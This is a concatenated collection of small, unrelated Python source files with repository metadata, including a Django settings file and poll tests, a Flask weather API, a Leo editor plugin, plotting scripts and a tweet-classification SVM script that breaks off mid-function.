8642e4c32537842396b996890c6920df00d39276
|
67151019609229b0d3465456f37b007ae7b7d8ed
|
refs/heads/master
| 2020-04-19T13:04:04.739708
| 2019-05-03T04:52:52
| 2019-05-03T04:52:52
| 168,208,530
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 316
|
py
|
import random
def make_HTML_heading(f):
txt = f()
def inner():
return '<h1>' + txt + '</h1>'
return inner
@make_HTML_heading
def greet():
greetings = ['Hello', 'Welcome', 'AYO!', 'Hola', 'Bonjour', 'Word up']
return random.choice(greetings)
obj = make_HTML_heading(greet)
print(obj())
|
[
"tzhao2@stuy.edu"
] |
tzhao2@stuy.edu
|
4e56868658dfc090de8a68bf44d6e20032def345
|
dba0f66eef2f173b8cc148d0c51fc338c7c9a70e
|
/leo/plugins/script_io_to_body.py
|
64a5971a900769082df1bc46a913b20e70bdfbab
|
[
"BSD-3-Clause",
"MIT"
] |
permissive
|
iggu/leo-editor
|
6adcbf1c7727f00115a62ffb68d31c22624e4404
|
a8cade8563afdc6b76638e152b91679209a5bf94
|
refs/heads/master
| 2022-03-16T05:44:42.864262
| 2022-02-25T13:30:51
| 2022-02-25T13:30:51
| 232,984,997
| 0
| 0
|
NOASSERTION
| 2021-05-05T03:32:44
| 2020-01-10T06:53:10
| null |
UTF-8
|
Python
| false
| false
| 2,699
|
py
|
#@+leo-ver=5-thin
#@+node:edream.110203113231.925: * @file ../plugins/script_io_to_body.py
"""Sends output from the Execute Script command to the end of the body pane."""
#@+<< imports >>
#@+node:ekr.20050101090207.4: ** << imports >>
from leo.core import leoGlobals as g
#@-<< imports >>
#@+others
#@+node:ekr.20071025195133: ** init
def init():
"""Return True if the plugin has loaded successfully."""
g.registerHandler('after-create-leo-frame', onCreate)
g.plugin_signon(__name__)
return True
#@+node:ekr.20071212092332: ** onCreate
def onCreate(tag, keys):
c = keys.get('c')
if c and c.frame.log:
g.pr('overriding c.executeScript')
# Inject ivars.
log = c.frame.log
c.script_io_to_body_oldexec = c.executeScript
c.script_io_to_body_oldput = log.put
c.script_io_to_body_oldputnl = log.putnl
# Override c.executeScript.
g.funcToMethod(newExecuteScript, c.__class__, 'executeScript')
c.k.overrideCommand('execute-script', c.executeScript)
#@+node:edream.110203113231.928: ** newPut and newPutNl (script_io_to_body.py)
# Same as frame.put except sends output to the end of the body text.
def newPut(self, s, *args, **keys):
p, u = self.c.p, self.c.undoer
body = self.frame.body
w = body.wrapper
if w:
bunch = u.beforeChangeBody(p)
w.insert("end", s)
p.v.b = w.getAllText()
u.afterChangeBody(p, 'put-to-body-text', bunch)
# Same as frame.putnl except sends output to the end of the body text.
def newPutNl(self, s, *args, **keys):
newPut(self, '\n')
#@+node:ekr.20071212091008.1: ** newExecuteScript & helpers
def newExecuteScript(self,
event=None, p=None, script=None,
useSelectedText=True, define_g=True,
define_name='__main__', silent=False
):
c = self
log = c.frame.log
redirect(c)
# Use silent to suppress 'end of script message'
c.script_io_to_body_oldexec(event, p, script, useSelectedText, define_g, define_name, silent=True)
undirect(c)
# Now issue the 'end of script' message'
if not silent:
tabName = log and hasattr(log, 'tabName') and log.tabName or 'Log'
g.ecnl()
g.es("end of script", color="purple", tabName=tabName)
#@+node:ekr.20071212090128: *3* redirect
def redirect(c):
log = c.frame.log.__class__
g.funcToMethod(newPut, log, "put")
g.funcToMethod(newPutNl, log, "putnl")
#@+node:ekr.20071212091008: *3* undirect
def undirect(c):
log = c.frame.log.__class__
g.funcToMethod(c.script_io_to_body_oldput, log, "put")
g.funcToMethod(c.script_io_to_body_oldputnl, log, "putnl")
#@-others
#@@language python
#@@tabwidth -4
#@-leo
|
[
"edreamleo@gmail.com"
] |
edreamleo@gmail.com
|
1e1ca32949ab7f4b87a9a82ade3d753ba1625207
|
a9a16c414d7370b2ca6442b8125d6b6f9b3d6556
|
/chapter_15_Practice_Makes_Perfect/01_Practice_Practice_Practice.py
|
51daa0041f8b8946ca854b78b7e006dfbdbbfe50
|
[] |
no_license
|
dennisnderitu254/CodeCademy-Py
|
99f1cb9fa011f1586d543650c5001de17f04b8b2
|
758067dc53fdb442ab18dd922dacd13cc8846ebb
|
refs/heads/master
| 2021-07-12T10:01:58.854222
| 2017-10-12T20:03:56
| 2017-10-12T20:03:56
| 106,739,488
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 38
|
py
|
# there is nothing in this lesson
pass
|
[
"dknderitu@gmail.com"
] |
dknderitu@gmail.com
|
e2d4ce3fa0ff8f54f16b22a66acca5b6fb6a0aad
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_099/ch11_2019_08_26_20_10_39_808921.py
|
28eb0e6b405098155853694d66fc3e46e0555cbf
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628
| 2020-12-16T05:21:31
| 2020-12-16T05:21:31
| 306,735,108
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 55
|
py
|
def celsius_para_farenheit(tempc):
return tempc*9/5+32
|
[
"you@example.com"
] |
you@example.com
|
e6b7c319cddbd8047260e2cb7481707eba515cc9
|
7c09c2b417d6ac454d98974019a21c08c8762704
|
/myapp/settings.py
|
4b21640a0ca76bbc7ebbd069255ea3d10d08f8a1
|
[] |
no_license
|
ehtiramabdullayev/myapp
|
03035323b3e13be3d524cafd65c3dd71db3731d8
|
d9b62c4babfa1acf407f0274e176f6397c0036bf
|
refs/heads/master
| 2021-01-23T07:59:53.683055
| 2014-05-25T08:42:31
| 2014-05-25T08:42:31
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,251
|
py
|
"""
Django settings for myapp project.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.6/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
from django.conf.urls import patterns, include, url
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'w70h!bgnbt(mpwtzaakqkqafknq6x@7f%#bqt69+yr#)2c(*@7'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.sites',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
#'django.contrib.staticfiles.finders.AppDirectoriesFinder',
'workapp',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
# 'django.contrib.sessions.middleware.SessionMiddleware'
)
ROOT_URLCONF = 'myapp.urls'
WSGI_APPLICATION = 'myapp.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.6/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'postgres',
'USER': 'openpg',
'PASSWORD': 'openpgpwd',
'HOST': '127.0.0.1', # Or an IP Address that your DB is hosted on
'PORT': '5432',
}
}
# DATABASES = {
# 'default': {
# 'ENGINE': 'django.db.backends.mysql',
# 'NAME': 'module',
# 'USER': 'root',
# 'PASSWORD': '',
# 'HOST': '127.0.0.1', # Or an IP Address that your DB is hosted on
# 'PORT': '3306',
# }
# }
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
os.path.join(os.path.dirname(__file__), 'templates'),
)
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
LANGUAGE_CODE = 'az-Az'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.6/howto/static-files/
STATIC_URL = '/static/'
SITE_ID=1
TEMPLATE_CONTEXT_PROCESSORS = (
'django.contrib.auth.context_processors.auth',
'django.core.context_processors.static',
)
PROJECT_DIR = os.path.dirname(os.path.abspath(__file__))
STATIC_ROOT_DEVELOPMENT = os.path.join(PROJECT_DIR, '../static/')
STATICFILES_DIRS = (
'C:/Django-1.6.4/django/bin/myapp/static',
)
|
[
"ehtiramabdullayev@gmail.com"
] |
ehtiramabdullayev@gmail.com
|
7510fbbd9c98a4b31410110aa00229ec8cd6e13a
|
61eaf0d21be4c76e16191f610e4871f71ea23c3c
|
/min and max temps during 3-31.py
|
d545bf826f26dd79b2ae45932c0738c26dd2a22f
|
[] |
no_license
|
Dpinkney001/DATA-SCIENCE-ASSIGNMENTS
|
0f7c1e50a3fc65986edc9906e940c34715217b75
|
fb8d5c52e2733768ce1b927b3c54464d99c2a533
|
refs/heads/master
| 2021-03-22T00:22:20.594942
| 2017-09-25T08:19:12
| 2017-09-25T08:19:12
| 104,555,772
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,222
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Sat Feb 11 18:52:18 2017
@author: Duvall Pinkney
"""
import matplotlib.pyplot as plt
import urllib
import urllib.request
import urllib.error
import urllib.parse
import re
def getTempFromWeb(kind,url):
page = urllib.request.urlopen(url)
lines = page.readlines()
for i in range(len(lines)):
if lines[i].decode("utf8").find(kind+" Temperature") >= 0:
m = i
break
searchObj = re.search('\d+', lines[m+2].decode("utf8"))
return int(searchObj.group(0))
def main():
prefix = "http://www.wunderground.com/history/airport/KLGA/"
suffix = "/31/03/DailyHistory"
years = []
maxVals = []
for year in range(1991,2017):
years.append(year)
url = prefix+str(year)+suffix
M = getTempFromWeb("Max",url)
maxVals.append(M)
print(year, M)
plt.plot(years, maxVals, color='r', label="Maxtemp")
plt.title("NYC Temps for March 31")
plt.xlabel('Years')
plt.ylabel('Degrees')
plt.legend(loc = 2,fontsize = 'x-small')
plt.show()
#create histogram of max temps for march 31
#xAxis = range(29)
#yAxis = range(101)
plt.hist(maxVals)
#plt.axis([1986, 2017, 0, 101])
plt.title("Histogram of Max Temps on March 31 Since 1986")
plt.xlabel("Temperatures")
plt.show()
print("The list of max values are: ", maxVals)
#plot of mininum temps
years = []
minVals = []
for year in range(1991,2017):
years.append(year)
url = prefix+str(year)+suffix
Min = getTempFromWeb("Min",url)
minVals.append(Min)
print(year, Min)
plt.plot(years, minVals, color='r', label="Mininumtemp")
plt.title("NYC Temps for March 31")
plt.xlabel('Years')
plt.ylabel('Degrees')
plt.legend(loc = 2,fontsize = 'x-small')
plt.show()
print("The list of min values are: ", minVals)
plt.hist(minVals)
#plt.axis([1986, 2017, 0, 101])
plt.title("Histogram of Min Temps on March 31 Since 1986")
plt.xlabel("Temperatures")
plt.show()
main()
|
[
"noreply@github.com"
] |
Dpinkney001.noreply@github.com
|
d23d3fd69628c2b1a999c5681d113cbbc3b30a91
|
daa9e61b910462012060dd34be7305d6b0e4f5f4
|
/gen_Lorenz.py
|
edc8d10aa2e14972206f28ac558ffff39f2afa72
|
[] |
no_license
|
lwyanne/Echo-State-Network
|
51bd130b2749e97580e07184d6dbddbcdefe4213
|
6193a78a4839e12f7231e9dbe621257f78714754
|
refs/heads/master
| 2020-03-29T08:18:35.998550
| 2018-10-11T05:14:44
| 2018-10-11T05:14:44
| 149,702,681
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 295
|
py
|
"""
Generate a trajectory of the Lorenz system
"""
import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from function import *
u=gen_Lorenz(len=10000)
u=downsample(u)
threeDplot(u,'Lorenz')
plt.figure()
plt.plot(u1)
plt.plot(u3)
|
[
"921174623@qq.com"
] |
921174623@qq.com
|
425bd3775fee51bd677d313e062215e408b513fc
|
79bc9a420df5c706b2ae06f4b75bf2bd2ba9646e
|
/emission/analysis/modelling/work_time.py
|
050691db89eaff2c5dc6e32a22810e75b94758ff
|
[
"BSD-3-Clause"
] |
permissive
|
Andrew-Tan/e-mission-server
|
7022786a13b4be87be62cfc2cc6d82543d063e5d
|
91d59bee86e63d803e401f10f4b6a2502effedda
|
refs/heads/master
| 2021-01-16T18:25:17.860723
| 2017-11-21T19:24:40
| 2017-11-21T19:24:40
| 100,073,534
| 0
| 0
|
BSD-3-Clause
| 2018-05-05T18:26:36
| 2017-08-11T22:13:44
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 4,066
|
py
|
__author__ = 'Yin'
# Standard imports
# Our imports
import emission.core.get_database as edb
import work_place as wp
import emission.core.common as ec
time_list = [[0,2],[2,4],[4,6],[6,8], [8,10], [10,12], [12,14], [14,16], [16,18], [18,20],[20,22],[22,24]]
def get_work_start_time(user_id,day):
# day should be from 1 to 5
# get a list of work starttime for Mon, or ...
Sections=edb.get_section_db()
list_of_time=[]
candidate_pnts=[]
work=wp.detect_daily_work_office(user_id,day)
for section in Sections.find({'$and':[{"user_id": user_id},{"commute":'to'}]}):
if work!='N/A' and ec.Is_place(section['section_end_point'],work,200):
list_of_time.append(section['section_end_time'])
return list_of_time
def get_work_end_time(user_id,day):
# day should be from 1 to 5
# get a list of work starttime for Mon, or ...
Sections=edb.get_section_db()
list_of_time=[]
candidate_pnts=[]
work=wp.detect_daily_work_office(user_id,day)
for section in Sections.find({'$and':[{"user_id": user_id},{"commute":'from'}]}):
if work!='N/A' and ec.Is_place(section['section_start_point'],work,200):
list_of_time.append(section['section_end_time'])
return list_of_time
def get_user_work_start_time(user):
list_of_time=[]
for day in range(1,6):
list_of_time.extend(get_work_start_time(user,day))
return list_of_time
def get_user_work_end_time(user):
list_of_time=[]
for day in range(1,6):
list_of_time.extend(get_work_end_time(user,day))
return list_of_time
def get_Alluser_work_start_time():
list_of_time=[]
Profiles=edb.get_profile_db()
for user in Profiles.distinct("user_id"):
for day in range(1,6):
list_of_time.extend(get_work_start_time(user,day))
return list_of_time
def get_Alluser_work_end_time():
list_of_time=[]
Profiles=edb.get_profile_db()
for user in Profiles.distinct("user_id"):
for day in range(1,6):
list_of_time.extend(get_work_end_time(user,day))
return list_of_time
############################################## pie chart below ###############################################
def get_user_work_start_time_pie(user,start,end):
Worktimes=edb.get_worktime_db()
timeCountMap = {}
for timesection in time_list:
key=str(timesection[0]).zfill(2) +':01 - '+str(timesection[1]).zfill(2) +':00'
timeCountMap[key] =Worktimes.find({"$and":[{'user_id':user},{'arr_hour':{"$gte": timesection[0], "$lt": timesection[1]}},\
{"date": {"$gte": start, "$lt": end}}]}).count()
return timeCountMap
def get_user_work_end_time_pie(user,start,end):
Worktimes=edb.get_worktime_db()
timeCountMap = {}
for timesection in time_list:
key=str(timesection[0]).zfill(2) +':01 - '+str(timesection[1]).zfill(2) +':00'
timeCountMap[key] =Worktimes.find({"$and":[{'user_id':user},{'dep_hour':{"$gte": timesection[0], "$lt": timesection[1]}},\
{"date": {"$gte": start, "$lt": end}}]}).count()
return timeCountMap
def get_Alluser_work_start_time_pie(start,end):
Worktimes=edb.get_worktime_db()
timeCountMap = {}
for timesection in time_list:
key=str(timesection[0]).zfill(2) +':01 - '+str(timesection[1]).zfill(2) +':00'
timeCountMap[key] =Worktimes.find({'arr_hour':{"$gte": timesection[0], "$lt": timesection[1]}},\
{"date": {"$gte": start, "$lt": end}}).count()
return timeCountMap
def get_Alluser_work_end_time_pie(start,end):
Worktimes=edb.get_worktime_db()
timeCountMap = {}
for timesection in time_list:
key=str(timesection[0]).zfill(2) +':01 - '+str(timesection[1]).zfill(2) +':00'
timeCountMap[key] =Worktimes.find({'dep_hour':{"$gte": timesection[0], "$lt": timesection[1]}},\
{"date": {"$gte": start, "$lt": end}}).count()
return timeCountMap
|
[
"shankari@eecs.berkeley.edu"
] |
shankari@eecs.berkeley.edu
|
7bd82afe2515d2d5a7a01681f53e2e8332cc0024
|
cc10b52870d3487b6a233fa6d63fcad45277e927
|
/env/bin/django-admin
|
17cfafa0c179f5ff7fad4ecdeff172c39379f971
|
[] |
no_license
|
malikgr8/Udemy_ecommerce_Source_code
|
9533f6749715df8b3bc05ce955a7dcd78412a9b3
|
b3e963ae9eadb43aece0db18aecfc6b805770a46
|
refs/heads/main
| 2023-06-24T03:15:30.050748
| 2021-07-20T16:47:21
| 2021-07-20T16:47:21
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 290
|
#!/home/macaulay/just_practice/env/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from django.core.management import execute_from_command_line
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(execute_from_command_line())
|
[
"pythonfamous@gmail.com"
] |
pythonfamous@gmail.com
|
|
586d7369371369435143676c7eede4bc2e9682a4
|
1a74d7a40749f5a233ab5a777056b62d8a83b2ce
|
/configs-sample.py
|
a254fa9dc989142dad408e55bfd3d465141c0949
|
[
"Apache-2.0"
] |
permissive
|
gisairo/amnesia
|
451f16eb5e02105e5ce9b3ca00763ba43ae56056
|
79010bfee4b43ac6b25ff72fd536d8f180b42d0a
|
refs/heads/master
| 2020-12-25T21:13:05.984266
| 2016-08-12T15:36:16
| 2016-08-12T15:36:16
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 246
|
py
|
#!/usr/bin/env python
twitter = {
'consumer_key': 'your_consumer_key',
'consumer_secret': 'your_consumer_secret',
'access_token': 'your_oauth_token',
'access_token_secret': 'your_oauth_token_secret',
'delete_after_days': 5
}
|
[
"jaisen@jmathai.com"
] |
jaisen@jmathai.com
|
354fa49447d55ca60b2e75090802d8a05cb93653
|
87ba60025d6385fbae2ba693c2758c819dd86bd7
|
/polls/tests.py
|
9be58097a239949634812acf297f427fb35d2ebd
|
[] |
no_license
|
jchen706/A-Django-Poll-Application
|
21f82159bd8d0a1b55e32af6f41fa95449959d62
|
13de7ed9bb8724490f344efc58c4033570427904
|
refs/heads/master
| 2020-03-26T02:30:42.642182
| 2018-08-11T22:45:29
| 2018-08-11T22:45:29
| 144,413,621
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,794
|
py
|
from django.test import TestCase
from django.urls import reverse
# Create your tests here.
import datetime
from django.test import TestCase
from django.utils import timezone
from .models import Question
class QuestionModelTests(TestCase):
def test_was_published_recently_with_future_question(self):
time = timezone.now() + datetime.timedelta(days=30)
future_question = Question(pub_date = time)
self.assertIs(future_question.was_published_recently(), False)
def create_question(question_text, days):
time = timezone.now() + datetime.timedelta(days=days)
return Question.objects.create(question_text=question_text, pub_date=time)
class QuestionIndexViewTests(TestCase):
def test_no_questions(self):
"""
If no questions exist, an appropriate message is displayed.
"""
response = self.client.get(reverse('polls:index'))
self.assertEqual(response.status_code, 200)
self.assertContains(response, "No polls are available.")
self.assertQuerysetEqual(response.context['latest_question_list'], [])
def test_past_question(self):
"""
Questions with a pub_date in the past are displayed on the
index page.
"""
create_question(question_text="Past question.", days=-30)
response = self.client.get(reverse('polls:index'))
self.assertQuerysetEqual(
response.context['latest_question_list'],
['<Question: Past question.>']
)
def test_future_question(self):
"""
Questions with a pub_date in the future aren't displayed on
the index page.
"""
create_question(question_text="Future question.", days=30)
response = self.client.get(reverse('polls:index'))
self.assertContains(response, "No polls are available.")
self.assertQuerysetEqual(response.context['latest_question_list'], [])
def test_future_question_and_past_question(self):
"""
Even if both past and future questions exist, only past questions
are displayed.
"""
create_question(question_text="Past question.", days=-30)
create_question(question_text="Future question.", days=30)
response = self.client.get(reverse('polls:index'))
self.assertQuerysetEqual(
response.context['latest_question_list'],
['<Question: Past question.>']
)
def test_two_past_questions(self):
"""
The questions index page may display multiple questions.
"""
create_question(question_text="Past question 1.", days=-30)
create_question(question_text="Past question 2.", days=-5)
response = self.client.get(reverse('polls:index'))
self.assertQuerysetEqual(
response.context['latest_question_list'],
['<Question: Past question 2.>', '<Question: Past question 1.>']
)
class QuestionDetailViewTests(TestCase):
def test_future_question(self):
"""
The detail view of a question with a pub_date in the future
returns a 404 not found.
"""
future_question = create_question(question_text='Future question.', days=5)
url = reverse('polls:detail', args=(future_question.id,))
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
def test_past_question(self):
"""
The detail view of a question with a pub_date in the past
displays the question's text.
"""
past_question = create_question(question_text='Past Question.', days=-5)
url = reverse('polls:detail', args=(past_question.id,))
response = self.client.get(url)
self.assertContains(response, past_question.question_text)
|
[
"junchen1511@gmail.com"
] |
junchen1511@gmail.com
|
f19c008e9dd2ca531140d9ec1fae17d55ccbf46e
|
1542f28c6c25b1d089961ad5662fb239e2be10f1
|
/app.py
|
b2404506ef34cfe5128864ca045e9b0f3b354d44
|
[] |
no_license
|
NHigs58/sqlalchemy-challenge
|
a61aa3ed2697329bf21c24c68ad2f945aaec91ad
|
3e3c5c5061761bb09b34710ea15d68f3613f4286
|
refs/heads/master
| 2021-02-06T06:06:47.391000
| 2020-03-01T04:04:14
| 2020-03-01T04:04:14
| 243,885,365
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,271
|
py
|
# import dependencies
import datetime as dt
import numpy as np
import pandas as pd
import sqlalchemy
from sqlalchemy.ext.automap import automap_base
from sqlalchemy.orm import Session
from sqlalchemy import create_engine, func
from flask import Flask, jsonify
# initializes database
engine = create_engine("sqlite:///Resources/hawaii.sqlite")
Base = automap_base()
Base.prepare(engine, reflect=True)
# creates references to Measurement
# and Station tables
Measurement = Base.classes.measurement
Station = Base.classes.station
session = Session(engine)
# start app
app = Flask(__name__)
# routes
@app.route("/")
def homepage():
"""List of all returnable API routes."""
return(
f"(Dates range from 2010-01-01 to 2017-08-23). <br><br>"
f"Available Routes: <br>"
f"/api/v1.0/precipitation<br/>"
f"Returns dates and temperature from the Date range. <br><br>"
f"/api/v1.0/stations<br/>"
f"Returns a json list of stations. <br><br>"
f"/api/v1.0/tobs<br/>"
f"Returns a list of Temperature Observations for Date range. <br><br>"
f"/api/v1.0/yyyy-mm-dd/<br/>"
f"Returns the Average, Max, and Min temperatures for a given start date.<br><br>"
f"/api/v1.0/yyyy-mm-dd/yyyy-mm-dd/<br/>"
f"Returns an Average, Max, and Min temperatures for a given date range."
)
@app.route("/api/v1.0/precipitation")
def precipitation():
"""Return Dates and Temp from the last year."""
results = session.query(Measurement.date, Measurement.tobs).\
filter(Measurement.date >= "2016-08-24", Measurement.date <= "2017-08-23").\
all()
# creates JSONified list
precipitation_list = [results]
return jsonify(precipitation_list)
@app.route("/api/v1.0/stations")
def stations():
"""Return a list of stations"""
results = session.query(Station.name, Station.station, Station.elevation).all()
# creates JSONified list of dictionaries
station_list = []
for result in results:
row = {}
row['name'] = result[0]
row['station'] = result[1]
row['elevation'] = result[2]
station_list.append(row)
return jsonify(station_list)
@app.route("/api/v1.0/tobs")
def temp_obs():
"""Return a list of tobs for the previous year"""
results = session.query(Station.name, Measurement.date, Measurement.tobs).\
filter(Measurement.date >= "2016-08-24", Measurement.date <= "2017-08-23").\
all()
# creates JSONified list of dictionaries
tobs_list = []
for result in results:
row = {}
row["Station"] = result[0]
row["Date"] = result[1]
row["Temperature"] = int(result[2])
tobs_list.append(row)
return jsonify(tobs_list)
@app.route('/api/v1.0/<date>/')
def given_date(date):
"""Return the average temp, max temp, and min temp for the date"""
results = session.query(func.avg(Measurement.tobs), func.max(Measurement.tobs), func.min(Measurement.tobs)).\
filter(Measurement.date >= date).all()
# creates JSONified list of dictionaries
data_list = []
for result in results:
row = {}
row['Start Date'] = date
row['End Date'] = '2017-08-23'
row['Average Temperature'] = float(result[0])
row['Highest Temperature'] = float(result[1])
row['Lowest Temperature'] = float(result[2])
data_list.append(row)
return jsonify(data_list)
@app.route('/api/v1.0/<start_date>/<end_date>/')
def query_dates(start_date, end_date):
"""Return the avg, max, min, temp over a specific time period"""
results = session.query(func.avg(Measurement.tobs), func.max(Measurement.tobs), func.min(Measurement.tobs)).\
filter(Measurement.date >= start_date, Measurement.date <= end_date).all()
# creates JSONified list of dictionaries
data_list = []
for result in results:
row = {}
row["Start Date"] = start_date
row["End Date"] = end_date
row["Average Temperature"] = float(result[0])
row["Highest Temperature"] = float(result[1])
row["Lowest Temperature"] = float(result[2])
data_list.append(row)
return jsonify(data_list)
if __name__ == '__main__':
app.run(debug=True)
|
[
"natehigs@me.com"
] |
natehigs@me.com
|
d7001dd38592a49dbda5f7ff0c6563451fa76648
|
b4bf2538e4c6c1a4ae0e13ef29bc886109f155ef
|
/Networking/rep.py
|
b912c58c064396321e5ba453f9be5559feffdf8c
|
[] |
no_license
|
Mobytoss/Harpy
|
4a2837521657b3e745f724df7f7ead836e52d51e
|
b42a93a35c84c879d79a58c01bd18090f225cc28
|
refs/heads/master
| 2020-05-16T21:48:42.347083
| 2013-10-15T13:42:12
| 2013-10-15T13:42:12
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 251
|
py
|
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Create a socket object
host = socket.gethostname()
port = 1234
s.connect((host, port))
input = ""
while input != "/exit":
input = raw_input("> ")
s.send(input)
s.close()
|
[
"toby.moss@me.com"
] |
toby.moss@me.com
|
e3925282d93077c51e6c35e61ba91226ed6be45b
|
6a95bda883586fb739c657bb3c320d4bd3c0aff4
|
/svm.py
|
58295d0bddcbe171fce83eaf6ecf5c27c3d5d91f
|
[] |
no_license
|
harpreetheer/group-I
|
515d62ab59ad09b9178f56cc482b939b6d363803
|
b660707fc66cb39319c0d04aca0bae0ed242cf84
|
refs/heads/master
| 2020-06-10T19:09:40.881974
| 2019-08-02T15:54:33
| 2019-08-02T15:54:33
| 193,716,543
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,491
|
py
|
from sklearn import svm
#import utils
import random
import numpy as np
from scipy.sparse import lil_matrix
from sklearn.feature_extraction.text import TfidfTransformer
import sys
import pickle
import random
def file_to_wordset(filename):
''' Converts a file with a word per line to a Python set '''
words = []
with open(filename, 'r') as f:
for line in f:
words.append(line.strip())
return set(words)
def write_status(i, total):
''' Writes status of a process to console '''
sys.stdout.write('\r')
sys.stdout.write('Processing %d/%d' % (i, total))
sys.stdout.flush()
def save_results_to_csv(results, csv_file):
''' Save list of type [(tweet_id, positive)] to csv in Kaggle format '''
with open(csv_file, 'w') as csv:
csv.write('id,prediction\n')
for tweet_id, pred in results:
csv.write(tweet_id)
csv.write(',')
csv.write(str(pred))
csv.write('\n')
def top_n_words(pkl_file_name, N, shift=0):
"""
Returns a dictionary of form {word:rank} of top N words from a pickle
file which has a nltk FreqDist object generated by stats.py
Args:
pkl_file_name (str): Name of pickle file
N (int): The number of words to get
shift: amount to shift the rank from 0.
Returns:
dict: Of form {word:rank}
"""
with open(pkl_file_name, 'rb') as pkl_file:
freq_dist = pickle.load(pkl_file)
most_common = freq_dist.most_common(N)
words = {p[0]: i + shift for i, p in enumerate(most_common)}
return words
def top_n_bigrams(pkl_file_name, N, shift=0):
"""
Returns a dictionary of form {bigram:rank} of top N bigrams from a pickle
file which has a Counter object generated by stats.py
Args:
pkl_file_name (str): Name of pickle file
N (int): The number of bigrams to get
shift: amount to shift the rank from 0.
Returns:
dict: Of form {bigram:rank}
"""
with open(pkl_file_name, 'rb') as pkl_file:
freq_dist = pickle.load(pkl_file)
most_common = freq_dist.most_common(N)
bigrams = {p[0]: i for i, p in enumerate(most_common)}
return bigrams
def split_data(tweets, validation_split=0.1):
"""Split the data into training and validation sets
Args:
tweets (list): list of tuples
validation_split (float, optional): validation split %
Returns:
(list, list): training-set, validation-set
"""
index = int((1 - validation_split) * len(tweets))
random.shuffle(tweets)
return tweets[:index], tweets[index:]
# Performs classification using SVM.
FREQ_DIST_FILE = '../train-processed-freqdist.pkl'
BI_FREQ_DIST_FILE = '../train-processed-freqdist-bi.pkl'
TRAIN_PROCESSED_FILE = '../train-processed.csv'
TEST_PROCESSED_FILE = '../test-processed.csv'
TRAIN = True
UNIGRAM_SIZE = 15000
VOCAB_SIZE = UNIGRAM_SIZE
USE_BIGRAMS = True
if USE_BIGRAMS:
BIGRAM_SIZE = 10000
VOCAB_SIZE = UNIGRAM_SIZE + BIGRAM_SIZE
FEAT_TYPE = 'frequency'
def get_feature_vector(tweet):
uni_feature_vector = []
bi_feature_vector = []
words = tweet.split()
for i in range(len(words) - 1):
word = words[i]
next_word = words[i + 1]
if unigrams.get(word):
uni_feature_vector.append(word)
if USE_BIGRAMS:
if bigrams.get((word, next_word)):
bi_feature_vector.append((word, next_word))
if len(words) >= 1:
if unigrams.get(words[-1]):
uni_feature_vector.append(words[-1])
return uni_feature_vector, bi_feature_vector
def extract_features(tweets, batch_size=500, test_file=True, feat_type='presence'):
num_batches = int(np.ceil(len(tweets) / float(batch_size)))
for i in range(num_batches):
batch = tweets[i * batch_size: (i + 1) * batch_size]
features = lil_matrix((batch_size, VOCAB_SIZE))
labels = np.zeros(batch_size)
for j, tweet in enumerate(batch):
if test_file:
tweet_words = tweet[1][0]
tweet_bigrams = tweet[1][1]
else:
tweet_words = tweet[2][0]
tweet_bigrams = tweet[2][1]
labels[j] = tweet[1]
if feat_type == 'presence':
tweet_words = set(tweet_words)
tweet_bigrams = set(tweet_bigrams)
for word in tweet_words:
idx = unigrams.get(word)
if idx:
features[j, idx] += 1
